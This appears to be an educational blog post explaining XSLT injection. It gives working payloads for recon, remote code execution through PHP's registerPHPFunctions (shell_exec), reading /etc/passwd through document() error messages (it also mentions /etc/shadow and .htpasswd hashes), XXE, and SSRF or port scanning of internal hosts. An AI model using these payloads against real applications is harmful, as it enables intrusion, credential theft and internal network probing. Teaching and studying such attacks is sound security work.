XSLT Injections for Dummies
Introduction
XML is a widely known format, and I am sure you have heard a lot about XXE (XML External Entity) attacks, which have even featured in the OWASP Top 10 list for web application security.
But have you heard of XSLT?
It stands for Extensible Stylesheet Language Transformations and is a language used for transforming XML documents into either XML or other formats like HTML, SVG, plain text, etc.
As the Wikipedia page for XSLT puts it:
Although XSLT is designed as a special-purpose language for XML transformation, the language is Turing-complete, making it theoretically capable of arbitrary computations.
That already sounds like a lot of fun.
XSLT provides constructs like loops, if, and switch-case, along with functions like substring, for manipulating XML documents. Not only that, it even lets you define your own reusable logic and call it: named templates in version 1, and proper functions from version 2 onwards. Amazing!
It uses XPath to locate subsets of the XML document tree, and you can then operate on them: check their values, apply functions to their contents, and much more.
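To make these constructs concrete, here is a minimal sketch of an XSLT 1.0 stylesheet. It assumes an input document shaped like `<events><event><name>…</name><value>…</value></event></events>`; the template name `label` and the thresholds are hypothetical and only there for illustration.

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>

  <!-- Named template: the XSLT 1.0 way to define reusable, callable logic -->
  <xsl:template name="label">
    <xsl:param name="text"/>
    <!-- substring() is 1-based: keep the first 10 characters -->
    <xsl:value-of select="substring($text, 1, 10)"/>
  </xsl:template>

  <xsl:template match="/events">
    <!-- Loop over every <event> child selected by the XPath expression -->
    <xsl:for-each select="event">
      <xsl:call-template name="label">
        <xsl:with-param name="text" select="name"/>
      </xsl:call-template>
      <xsl:text>: </xsl:text>
      <!-- xsl:choose plays the role of switch-case -->
      <xsl:choose>
        <xsl:when test="value &gt; 100">high</xsl:when>
        <xsl:when test="value &gt; 10">medium</xsl:when>
        <xsl:otherwise>low</xsl:otherwise>
      </xsl:choose>
      <!-- xsl:if has no else branch; emit a newline between events -->
      <xsl:if test="position() != last()">
        <xsl:text>&#10;</xsl:text>
      </xsl:if>
    </xsl:for-each>
  </xsl:template>
</xsl:stylesheet>
```

Each event is printed as a truncated name followed by a rough size bucket, which exercises a loop, a condition, a switch-case, a function call and a user-defined template in one go.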
There’s a really awesome tutorial on XSLT and XPath. I highly recommend it if you wish to learn more about XSLT and XPath. But for the scope of this post, what we have discussed so far will suffice.
XSLT Injections
Now let’s talk about the interesting bits.
Injection issues happen when user input is blindly trusted without thinking of the consequences. Under the right conditions, this can result in data exfiltration, RCE, XSS and much more.
If a user is able to supply their own XSLT files or inject XSLT tags, the result can be an XSLT injection. The constructs you have at your disposal depend greatly on the processor being used and the version of the XSLT specification it implements. Version 1 is the most widely used and supported: the newer versions (2 and 3) are backwards compatible with it, and browsers support version 1, hence its popularity.
Versions 2 and 3 have a lot more features than version 1, so exploitation becomes much easier with the higher versions. Still, you can get a lot done with version 1. Here are some interesting issues:
- RCE
- Local File Read (via error messages)
- XXE
- SSRF and Port Scans
The XSLT ecosystem has a number of different processors. libxslt is quite common, and most processors implement version 1; a notable exception is Saxon by Saxonica, which is quite feature rich and supports both versions 1 and 2.
So for this discussion, we will focus on libxslt. It’s a C library developed for the GNOME project, and you can try it out from the command line on Linux using the xsltproc command.
Now let’s focus on the attacks. This is not supposed to be an exhaustive guide on the subject (I’ve linked more resources at the end of this article for a deeper dive). We will just touch upon the basics and I will show you RCE & Local File Read using XSLT injection.
Consider an application that takes an arbitrary XSLT file and then parses its contents. What do you think could happen?
Recon
You might be thinking that all this is good to know, but how do you find out which processor is being used? Otherwise it would be a sort of “blind” attack, and that’s more painful and noisy, right? Worry not, there are some tags you can use for recon.
These three tags give you back the version, vendor and vendor URL:
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
With that, you know which processor you are dealing with and which features it supports, and you can move on to the exploitation part.
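For reference, here is a minimal sketch of a complete stylesheet that wraps those three tags so it can be processed as-is. The text labels are just for readability; with libxslt you could run it as `xsltproc recon.xsl input.xml`, where both file names are hypothetical and `input.xml` can be any well-formed XML document.

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:output method="text"/>
  <!-- Match the document root so the template fires for any input document -->
  <xsl:template match="/">
    <xsl:text>Version: </xsl:text>
    <xsl:value-of select="system-property('xsl:version')"/>
    <xsl:text>&#10;Vendor: </xsl:text>
    <xsl:value-of select="system-property('xsl:vendor')"/>
    <xsl:text>&#10;Vendor URL: </xsl:text>
    <xsl:value-of select="system-property('xsl:vendor-url')"/>
    <xsl:text>&#10;</xsl:text>
  </xsl:template>
</xsl:stylesheet>
```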
RCE
A malicious XSLT file can result in RCE if the application is vulnerable, for example when it uses PHP’s XSLTProcessor with registerPHPFunctions enabled.
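As a minimal sketch of such a file, assuming the target is a PHP application that called `registerPHPFunctions()` on its `XSLTProcessor` without restricting the allowed functions, a stylesheet can reach PHP functions through the `http://php.net/xsl` namespace. The `id` command is only a harmless placeholder.

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <!-- php:function() calls a PHP function by name; here shell_exec runs
         the placeholder command 'id' and its output lands in the result -->
    <xsl:value-of select="php:function('shell_exec', 'id')"/>
  </xsl:template>
</xsl:stylesheet>
```

If the application passed a list of allowed functions to `registerPHPFunctions()`, only those functions should be callable, so this exact payload may fail even though the feature is enabled.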
Local File Read
And not only that, you could even read the contents of a local file (at least 1 line) via the reported error messages:
[Figure: XSLT file containing the payload to read the /etc/passwd file]
[Figure: Processing the XSLT file leaks the first line of the /etc/passwd file]
Notice that the application gave out an error, but the first line was still revealed! This happens because the document() function (or the xsl:include and xsl:import elements, for that matter) tries to parse the specified file as XML. Since the passwd file is not valid XML, parsing fails, and the error message shows the first line of the file.
Now you might think that this is quite limiting, but wait a minute… If the application is running as root, you could get the root user’s password hash by reading the first line of the /etc/shadow file. And you could even read the contents of a .htpasswd file to get the password hash for the admin or other users.
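A minimal sketch of a stylesheet that triggers this behaviour, assuming libxslt and an application that shows parser errors to the user, could look like this:

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <!-- document() tries to parse the target as XML. /etc/passwd is not XML,
         so the parser fails and its error message quotes the offending line -->
    <xsl:copy-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>
```

Whether anything leaks depends on how the application handles errors: if parser errors are suppressed or only logged server-side, the same stylesheet produces nothing useful.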
So it isn’t all in vain.
XXE
You could even perform XXE but that should be obvious. Consider this example:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "path/to/file">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/events">
Events &ext_file;:
<xsl:for-each select="event">
<xsl:value-of select="name"/>: <xsl:value-of select="value"/>
</xsl:for-each>
</xsl:template>
</xsl:stylesheet>
SSRF & Port Scanning
Using a payload like this one (omitted the extra stuff just for brevity):
<xsl:copy-of select="document('http://10.10.10.10:22')"/>
You can see that this would make a request to the specified IP. With this primitive, you can perform SSRF and even port scans by leveraging the different error messages you get back in different scenarios (port open, port closed, invalid host, etc.).
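For completeness, here is the same payload as a full stylesheet, a minimal sketch that reuses the IP address and port from the fragment above and assumes the processor is allowed to fetch URLs over the network:

```xml
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <!-- The processor connects to the target to fetch the "document".
         Changing the host or port and comparing the resulting errors is
         what turns this into a port scan -->
    <xsl:copy-of select="document('http://10.10.10.10:22')"/>
  </xsl:template>
</xsl:stylesheet>
```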
Extra Resources
I’ve gone through only a few of the attacks that can be performed, but there’s more! For that, I recommend going through the following resources, which go into much more depth:
Closing Thoughts
I hope you enjoyed this post and learnt something interesting. I wanted to cover XSLT injections at a high level and show the different attacks that are possible. There’s a lot more to learn, and the resources I have linked should give you a much deeper understanding. Overall, there’s not much to this vulnerability beyond untrusted user input being handed to the processor; the nuances are specific to the different processors and languages.